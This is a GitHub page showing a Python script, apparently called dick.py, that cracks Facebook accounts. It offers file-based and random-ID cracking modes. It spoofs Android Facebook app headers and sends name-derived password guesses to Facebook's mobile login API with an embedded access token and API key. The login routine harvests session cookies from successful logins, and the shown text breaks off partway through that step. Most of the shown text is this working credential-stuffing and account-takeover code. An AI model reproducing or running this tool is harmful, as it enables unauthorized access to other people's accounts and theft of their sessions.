-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathdick.py
895 lines (852 loc) · 42.7 KB
/
dick.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
#!/usr/bin/python
#Original written By WHOAMI-DMC ==DEVIL MAY CRY
import os,zlib
from os import system as osRUB
from os import system as cmd
os.system('clear')
print('loading Modules ...\n')
try:
import requests
except ImportError:
print('\n installing Requests ...\n')
os.system('pip install requests')
try:
import concurrent.futures
except ImportError:
print('\n installing futures ...\n')
os.system('pip install futures')
try:
import mechanize
except ModuleNotFoundError:
os.system('pip install mechanize > /dev/null')
from urllib.request import Request, urlopen
import os, requests, re,platform, sys, random, subprocess, threading, itertools,base64,uuid,zlib,re,json,uuid,subprocess,shutil,webbrowser,time,json,sys,random,datetime,time,re,subprocess,platform,string,json,time,re,random,sys,string,uuid
from concurrent.futures import ThreadPoolExecutor as sarfrazDMC
from string import *
from random import randint
from time import sleep as slp
from os import system as cmd
from zlib import decompress
import os, platform
from concurrent.futures import ThreadPoolExecutor
fast_work = ThreadPoolExecutor(max_workers=15).submit
model2 = requests.get('https://gist.githubusercontent.com/Nox-Naved/0588acb2b77932048a251d50a973029b/raw/f6de01ac684131b5353854ee114880fb00227cee/Model60').text.splitlines()
totaldmp = 0
count = 0
loop = 0
oks = []
cps = []
id = []
ps = []
sid = []
total=[]
methods = []
srange = 0
saved = []
totaldmp = 0
filter = []
def randBuildLSB():
vchrome = str(random.randint(100,925))+".0.0."+str(random.randint(1,8))+"."+str(random.randint(40,150))
VAPP = random.randint(410000000,499999999)
END = '[FBAN/FB4A;FBAV/374.0.0.20.109;FBBV/381462200;FBDM/{density=2.0,width=720,height=1456};FBLC/en_US;FBRV/382083935;FBCR/1010;FBMF/Green;FBBD/Green;FBPN/com.facebook.katana;FBDV/GREEN 2020;FBSV/11;FBOP/1;FBCA/arm64-v8a:;]'
ua = f'Dalvik/2.1.0 (Linux; U; Android {random.randint(4,13)}; {random.choice(model2)} Build/QP1A.{random.randint(111111,999999)}.{random.randint(111,999)}) '+END
return ua
def randBuildvsskj():
END = '[FBAN/EMA;FBBV/352223683;FBAV/291.0.0.12.110;FBDV/SM-G935FD;FBLC/en_GB;FBNG/WIFI;FBMNT/NOT_METERED;FBDM/{density=1.0125}]'
ua = f'Dalvik/2.1.0 (Linux; U; Android {random.randint(4,13)}; {random.choice(model2)} Build/QP1A.{random.randint(111111,999999)}.{random.randint(111,999)}) '+END
return ua
sys.stdout.write('\x1b]2; DMC\x07')
S = '\033[1;37m'
A = '\x1b[38;5;208m'
R = '\x1b[38;5;46m'
F = '\x1b[38;5;48m'
Z = '\033[1;33m'
head = {'Host': 'adsmanager.facebook.com', 'sec-ch-ua': '"Chromium";v="107", "Not=A?Brand";v="24"', 'viewport-width': '980'}
logo = """
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⣶⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢯⣿⣲⣄⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣟⣽⢟⣕⢄⠀⠀⠀⠀⠀⠀⣧⠀⡀⠀⠀⠀⠀⢠⢮⡾⣽⡻⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡿⣮⣟⡼⡌⡆⠀⠀⠀⠀⡰⡵⠰⡃⠀⠀⠀⢠⢃⡻⣜⢯⣻⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡿⣮⡵⣫⡵⢹⠀⠀⠀⠻⡄⡧⣈⠚⠀⠀⠀⢸⢺⡗⣭⣛⢿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⡿⡵⢞⣫⡆⡹⠀⠀⠀⢑⠥⡨⡐⠫⣢⠀⠀⢸⢺⣽⢚⡭⣯⣿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣿⣿⣶⣻⡭⣷⢣⠇⠄⠤⢀⠼⣄⣸⡌⡆⢠⡧⠀⠈⡷⣮⢯⣛⣶⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀
⠀⠀⠈⠢⡀⠠⡒⠀⠂⠐⠀⠂⠀⣀⣴⢾⣿⣿⣿⣷⣚⣷⡿⣳⠛⠒⠒⠒⢇⠏⡚⠓⠈⢀⢬⠓⠒⠒⠚⢞⡯⣟⣶⣛⣿⣿⣿⣿⡦⣖⠀⠀⠀⠀⠂⠐⠀⡄⠀⠐⠁⠀⠀⠀
⠀⠀⠀⠀⠘⡄⠈⠢⡀⢀⣠⡴⣟⢿⣹⢿⣺⣿⣟⣶⣛⡭⠛⠁⠀⠀⠀⠀⠈⣑⣜⡆⢔⣕⣁⠀⠀⠀⠀⠀⠙⢯⡞⣛⣾⣿⣿⣸⣿⣹⣿⠶⣤⡀⠀⡠⠊⢀⠎⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠈⣦⡴⣾⢯⡽⢾⡹⣾⣝⣾⣟⠫⠞⠋⡁⠤⠀⠒⠀⠉⠁⠀⠀⠀⢈⣷⣁⠀⠀⠀⠀⠉⠁⠐⠂⠤⢈⡙⠛⠯⣻⣾⣷⣏⢾⣻⢫⡽⣻⠶⣤⡂⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣾⣯⣷⣯⣻⣿⣧⣿⣟⡕⢋⢠⠐⠊⠁⠀⡀⣤⢀⣲⣦⣭⣥⣤⣴⣶⣤⣴⣦⣤⣬⣭⣥⣖⣂⣤⣄⡀⠀⠁⠂⡄⡉⢪⣟⣿⣵⣯⣾⣭⣟⣏⣿⡄⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢸⢿⣿⣿⣿⣯⣿⣿⢳⣾⠇⠋⢀⢠⠰⠘⢃⣡⣾⣿⣿⢿⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢻⣿⣿⣷⣮⣁⠃⠶⡄⡀⠁⠳⢹⣏⣿⣟⣿⣿⣾⣿⣿⣇⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢸⣟⢟⢿⣝⣟⣻⢻⢿⠁⢀⠜⠋⠀⠀⣠⣿⣿⠏⣿⣧⡇⣸⣿⣟⣯⡿⣽⣻⡿⣽⣿⣏⢈⣼⣿⡟⣧⣝⢧⡀⠀⠁⠃⡄⠀⡏⡿⣻⣻⣻⡽⣫⢻⣿⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢸⣿⢼⣱⢬⣙⡻⠭⣯⣦⣀⠑⠄⣀⣼⣿⣿⣮⠃⢿⣻⡿⣿⠟⣾⢷⣻⢯⣷⣟⣿⡻⣿⣿⣟⣿⠃⡾⣿⣷⡵⣄⢀⠔⢁⣠⣷⠿⢝⡚⡭⢮⣹⢿⡇⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢿⣾⣹⢾⡱⣺⠭⣽⣱⢞⡿⣩⢿⣟⣳⣿⢿⣿⣿⣿⡽⡍⢸⣟⣯⣟⣿⢾⡽⣾⡇⠙⣺⣽⣿⣷⣿⣿⣷⢻⣷⣭⢻⣗⢦⣻⡱⣽⢚⣟⣦⣿⣿⠃⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⡸⢿⣿⣟⣧⣷⣹⢥⠷⣞⣱⢏⡾⣱⣎⠧⣽⡱⠯⣟⢿⡡⠈⣿⣳⢿⡾⣿⡽⣷⠃⢄⡧⣟⡝⡧⢿⣲⣙⣧⢳⡞⣧⠺⡭⣖⢿⣸⣏⣷⣿⣿⠏⠀⠀⠀⠀⠀⠀
⠀⠀⠀⢀⠜⠀⠠⠛⠿⣿⣿⣿⣿⣿⣵⣯⣾⢾⡳⣌⣿⢣⣝⣟⢣⠗⣝⢷⣿⣟⣯⣟⡷⣿⣿⡶⣫⣚⢖⡻⣵⣋⠷⣞⠼⣯⣳⣽⣯⣿⣿⣿⣿⣿⠿⠛⢅⠀⠑⡀⠀⠀⠀⠀
⠀⠀⢀⠎⠀⡰⠁⠀⠀⠀⠈⠉⠛⣿⣿⣿⣿⣷⣿⣋⣮⢷⡹⣌⣧⢿⢫⢵⣻⣟⣾⣽⣻⢷⡿⡽⣜⢻⢮⣕⢫⢷⣽⣎⣿⣿⣿⣿⣿⡿⡟⠉⠉⠀⠀⠀⠀⢢⠀⠘⠄⠀⠀⠀
⠀⢀⠊⠀⡐⠀⠀⢀⣀⠀⠀⠀⢸⣿⣾⣿⣿⣿⣿⣿⣾⡷⢻⡹⣜⣣⣿⢫⢧⣿⣟⣾⣽⣿⢻⣞⣧⣏⡳⢯⣛⢾⣶⣿⣿⣿⣿⣿⣿⡇⢻⠀⠀⠀⢀⣀⠀⠀⠡⠀⠈⡄⠀⠀
⠀⠌⠀⡰⠀⠀⠀⢸⣿⣷⣤⣀⠘⣿⣿⣿⣿⣿⣿⣽⣷⣿⣿⣿⣭⣷⣼⣟⣾⣻⣿⣯⢿⣏⣿⣿⣶⣾⣽⣻⣟⣿⣻⣿⣽⣿⣿⣿⣿⣇⡏⢀⣤⣴⡿⡝⠀⠀⠀⢣⠀⠘⡀⠀
⠐⠀⢠⠁⠀⠀⠀⠀⠙⣷⣿⣻⣷⣿⣿⣿⣻⣟⣿⣯⣿⣿⣽⣯⣟⣭⣷⣿⣾⡿⣯⣿⢿⣿⣷⣿⣿⣼⣹⣿⣻⣿⣿⣽⣿⢿⣻⣽⣿⣿⢳⣿⣟⣟⠟⠀⠀⠀⠀⠀⠆⠀⢡⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣷⣟⣿⣽⣿⣯⣷⣿⡾⣿⣶⣯⣟⠿⣟⣿⣻⣽⢿⣽⣻⣿⣻⣾⣳⢯⣟⣿⣻⣿⣿⣟⣿⣭⣛⣿⣳⣯⣿⣏⣾⣟⣾⣿⠀⠀⠀⠀⠀⠀⠘⡀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⢿⣿⣿⣟⣿⢿⣯⣟⣷⣻⣾⣽⣻⣾⡿⣷⣿⣻⣾⢿⣷⣿⢿⣻⣿⣻⣿⢿⣻⣾⣽⣾⣽⣻⣽⡿⣿⢷⣽⣿⣿⣿⢹⠀⠀⠀⠀⠀⠀⠀⠃⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣟⣿⣿⣿⣯⣿⣟⣿⣿⣿⣷⣿⣻⣾⣽⢿⣽⣻⢾⡿⣯⢿⣻⣽⢯⡿⣽⡻⣫⣵⣾⣾⣿⣟⣿⣿⢿⡟⣾⣿⣟⣿⡞⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣻⣽⣿⣯⣟⣿⣿⣿⡿⠟⢻⠟⡿⣾⣭⣽⣿⣽⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠟⢛⠿⣿⣿⣿⣿⣿⢸⣿⡿⣿⡞⠀⠀⠀⠀⠀⠀⠀⠀⠘⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⢿⣿⣟⣿⣿⣿⣿⠀⠀⢼⠠⠌⠘⣿⣿⣿⣿⡿⣿⣟⢿⣿⣿⣿⡋⠀⠄⡤⠄⠈⣿⣿⣿⣿⣼⢸⣿⣿⢻⠀⠀⠀⠀⠀⠀⠀⠀⠀⢘⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⣿⣻⣿⣿⣿⣿⣶⣶⣶⣶⣿⣿⣿⣿⣿⢿⣻⣯⣸⣷⣿⣿⣿⣷⣶⣷⣶⣾⣿⣿⣿⣿⢿⣾⣿⣿⣾⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⢿⣿⣿⢷⣿⣿⣿⣯⡿⢷⣿⣿⣿⣿⣿⣻⣷⣿⣿⣿⣿⣞⣿⣻⣽⢿⣿⣿⣷⣿⣟⣫⣿⣿⣿⣿⣷⡌⣻⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⣯⣿⣳⣿⣽⣻⣿⣻⡽⣟⣾⣳⣿⣿⣿⣿⣿⣿⣿⣷⢿⣿⣻⢾⣻⣟⡿⣿⡯⢿⣾⣿⣵⣿⡣⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⢿⣿⣿⣿⣿⣿⣿⣿⣯⣷⡿⣿⣿⣿⣿⣿⣿⣿⣿⡾⣟⣯⣯⣴⣿⣿⣿⣿⣿⣿⣿⠎⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠀⠀⠀
⠀⠀⠈⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⠊⣿⣿⣿⣿⣿⣿⣿⡾⣟⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⡉⠢⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠃⠀⠄⠀
⠀⠀⠀⠘⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠊⠠⠈⠈⣿⣷⣿⢻⣷⣿⣿⢿⣻⣿⡿⣿⣿⢿⣿⣻⣷⣿⡻⣿⡿⡏⣿⣷⣿⠃⠑⢄⠐⢄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠎⠀⡰⠀⠀
⠀⠀⢢⠀⠘⡀⠀⠀⠀⠀⠀⠀⡠⠐⢀⠔⠁⠀⠀⢸⣿⣿⣼⠂⢻⠃⣿⢻⣷⣿⣿⣾⣿⡟⣿⡟⢿⠋⣿⠁⣸⣿⣿⣿⠀⠀⠀⠑⠄⠑⢄⠀⠀⠀⠀⠀⠀⢀⠎⠀⡰⠁⠀⠀
⠀⠀⠀⠡⡀⠈⢄⠀⢀⡠⠔⠊⠀⠀⠆⠀⠀⠀⠀⢸⣿⣿⣿⣷⣿⠀⣯⠀⡿⢹⠛⣿⠟⣷⣿⠃⣾⡄⠙⣶⣿⣿⣽⣿⠀⠀⠀⠀⠈⡄⠀⠈⠂⠄⣀⠀⢠⠊⠀⡐⠁⠀⠀⠀
⠀⠀⠀⠀⠑⡀⠀⠪⡉⠉⠉⠉⠉⠉⠁⠀⠀⠀⠀⠘⣿⣿⢿⣿⢧⡚⣿⣤⡇⡸⠀⢿⠀⢹⣿⣦⣿⡇⣿⣿⣿⣿⣾⠇⠀⠀⠀⡀⠈⠉⠉⠉⠉⠉⠉⡙⠁⢀⠜⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠘⢆⠀⠘⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⢿⣿⣿⣿⣿⣷⣦⣿⣤⣾⣿⣿⣿⣿⡿⡜⣿⣷⡟⠀⠀⣴⣿⣿⣿⣶⡄⠀⠀⣠⠞⠀⣠⠆⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠈⠳⡄⠈⠃⠀⠀⣤⣤⡄⢠⠀⢠⡄⢨⣿⡿⣿⣯⠹⠻⣿⣿⣿⣿⣿⣿⢿⡿⣿⡿⣿⣽⣾⣿⢻⢧⣤⣼⣿⣵⣦⢨⣿⣿⣤⠞⠁⠀⠞⠁⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠈⠢⡀⠀⠐⢌⡉⠐⠢⡀⠀⠀⢰⠹⢿⣻⢿⣸⣄⢹⡻⢿⣿⣿⣿⡿⣿⣜⢿⣞⣿⣿⣳⠏⠉⠀⠀⠙⣿⠟⠀⣹⡇⡇⢀⠔⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠑⢄⡀⠈⠂⠄⡀⠑⠄⠘⠴⠉⣿⣟⣿⣧⣼⣧⣸⡆⣼⢀⣿⣿⣟⣧⡻⣿⣿⣷⣦⡰⠀⡠⠊⡠⡶⠈⣾⣿⠗⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠒⠄⡀⠀⠁⠂⠆⠀⢌⠈⣿⣯⢿⡽⣯⣿⢿⡿⣾⣟⣿⣿⢿⣻⣮⣿⣾⡿⣦⣘⠂⠁⠀⣠⣾⡿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡀⢀⡀⠀⠀⠀⠀⠁⠂⡄⢀⡀⠀⠁⠐⠛⠻⢽⣳⣟⣯⣟⣷⣻⣾⣽⠿⢿⣿⣞⣯⢿⡿⣿⣻⣿⢿⣟⢿⡿⠁⣀⠀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⡠⠊⠀⠀⠀⠈⡆⠀⠀⠀⢀⠎⢠⠂⠈⠑⡀⠠⡀⠤⠤⠀⠀⠀⠀⠀⠀⠀⠠⠤⠄⢘⠙⠻⠯⢿⣟⣷⣯⡿⠾⠋⢀⠊⠀⠀⠀⠈⢢⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢠⠁⠀⢠⠊⠀⠈⠃⠀⠀⢀⠂⡠⠁⠀⠀⠀⠈⢄⠐⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⠁⡰⠁⠀⠀⠀⢢⠈⢄⠀⠀⠈⠊⠀⠁⠂⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠈⡄⠀⠘⢄⠀⠀⠀⢀⠠⠁⡐⠁⠀⠀⠀⠀⠀⠈⢂⠈⢄⠀⠀⠀⠀⠀⠀⠀⠀⡐⠁⠔⠀⠀⠀⠀⠀⠀⠡⡀⠢⡀⠀⠀⠀⢀⠄⠀⠀⠇⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠐⢄⠀⠀⠉⠐⠂⠁⠀⠌⠀⠀⠀⠀⠀⠀⠀⠀⠀⠣⠀⠢⠀⠀⠀⠀⠀⢀⠌⢀⠌⠀⠀⠀⠀⠀⠀⠀⠀⠑⢄⠀⠁⠒⠈⠀⠀⢀⠌⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⠂⠠⠄⠐⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠱⡀⠡⡀⠀⠀⢠⠊⢀⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⠒⠀⠄⠀⠂⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠄⠐⠄⡠⠁⡠⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢆⠈⠀⡐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢢⠌⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
\033[1;37m------------------------------------------------
\033[1;37m Owner : DEVIL MAY CRY
\033[1;37m Facebook: Whoami Dmc
\033[1;37m Github : WHOAMI-DEVIL-HACKER
\033[1;37m Version : 1.9.8
\033[1;37m------------------------------------------------ """
def clear():
os.system("clear")
print(logo)
def result(OKs,cps):
if len(OKs) != 0 or len(cps) != 0:
print('\n')
print(47*'-')
print(' The Process has been Complete...')
print(' TOTAL OK: %s' % str(len(oks)))
print(' TOTAL CP: %s' % str(len(cps)))
print(47*'-')
input("Press enter to back DMC Menu ")
exit()
def sarfraz():
os.system('clear')
print(logo)
print(f'[1] File Crack')
print(f'[2] Public ID Crack')
print(f'[3] Random Crack ')
print(f'[4] Create File')
print(f'[5] Login Tool')
print(f'[6] Logout Cookie')
print(f'[7] Remove Trash Files ')
print(f'[8] Separate Ids')
print(f'[9] Remove Duplicate IDs')
print(f'[W] Join Whatsapp Group ')
print(f'[F] Join Facebook Group ')
print('')
select = input('Select Menu>: ')
if select =='1':
method_crack()
elif select =='2':
exit(' This is Option Soon available ... ')
elif select =='3':
random_number()
elif select =='4':
menu()
elif select =='5':
login()
elif select =='6':
remove_Tc()
elif select =='7':
removef()
elif select =='8':
sids()
elif select =='9':
cutter()
elif select =='W':
os.system('xdg-open https://chat.whatsapp.com/CMT3T8wrCECFglMGdFfN5X')
pass
elif select =='F':
os.system('xdg-open https://facebook.com/groups/3017062**71082/')
else:
print('\n Select valid option ... ')
time.sleep(2)
DMC(allkey)
def method_crack():
global methods
clear()
print(f'[1] Method {1}')
print(f'[2] Method {2}')
print(f'[3] Method {3}')
#print(f'[4] Method {4}')
print(f'[0] Back')
print('')
option = input('Select method>: ')
if option =='1':
methods.append('methodA')
main_crack().crack(id)
elif option =='2':
methods.append('methodB')
main_crack().crack(id)
elif option =='3':
methods.append('methodC')
main_crack().crack(id)
# elif option =='4':
# methods.append('methodD')
# main_crack().crack(id)
elif option =='0':
sarfraz()
else:
print('\n Select Valid Option ...')
time.sleep(2)
method_crack()
class main_crack():
def __init__(self):
self.id=[]
def crack(self,id):
global methods
clear()
self.file = input('Put File Name : ')
try:
self.id = open(self.file).read().splitlines()
self.pasw()
except FileNotFoundError:
print('Opps File Not Found ...')
time.sleep(2)
os.system('clear')
print(logo)
print('Try Again ...')
time.sleep(2)
main_crack().crack(id)
def methodA(self, sid, name, psw):
try:
global oks,cps,loop
sys.stdout.write(f"\r {S}[DMC] {loop} | M1 OK/CP {len(oks)}/{len(cps)} | {S}{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
sys.stdout.flush()
fs = name.split(' ')[0]
try:
ls = name.split(' ')[1]
except:
ls = fs
for pw in psw:
ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
with requests.Session() as session:
data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "device_based_login",
"email": sid,
"password": ps,
"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_GB",
"client_country_code": "GB",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
headers = {'User-Agent': randBuildvsskj(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': 'MOBILE.LTE',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',}
q = session.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
if 'session_key' in q:
ckkk = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"]);DMCb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-");cookie = f"sb={DMCb};{ckkk}"
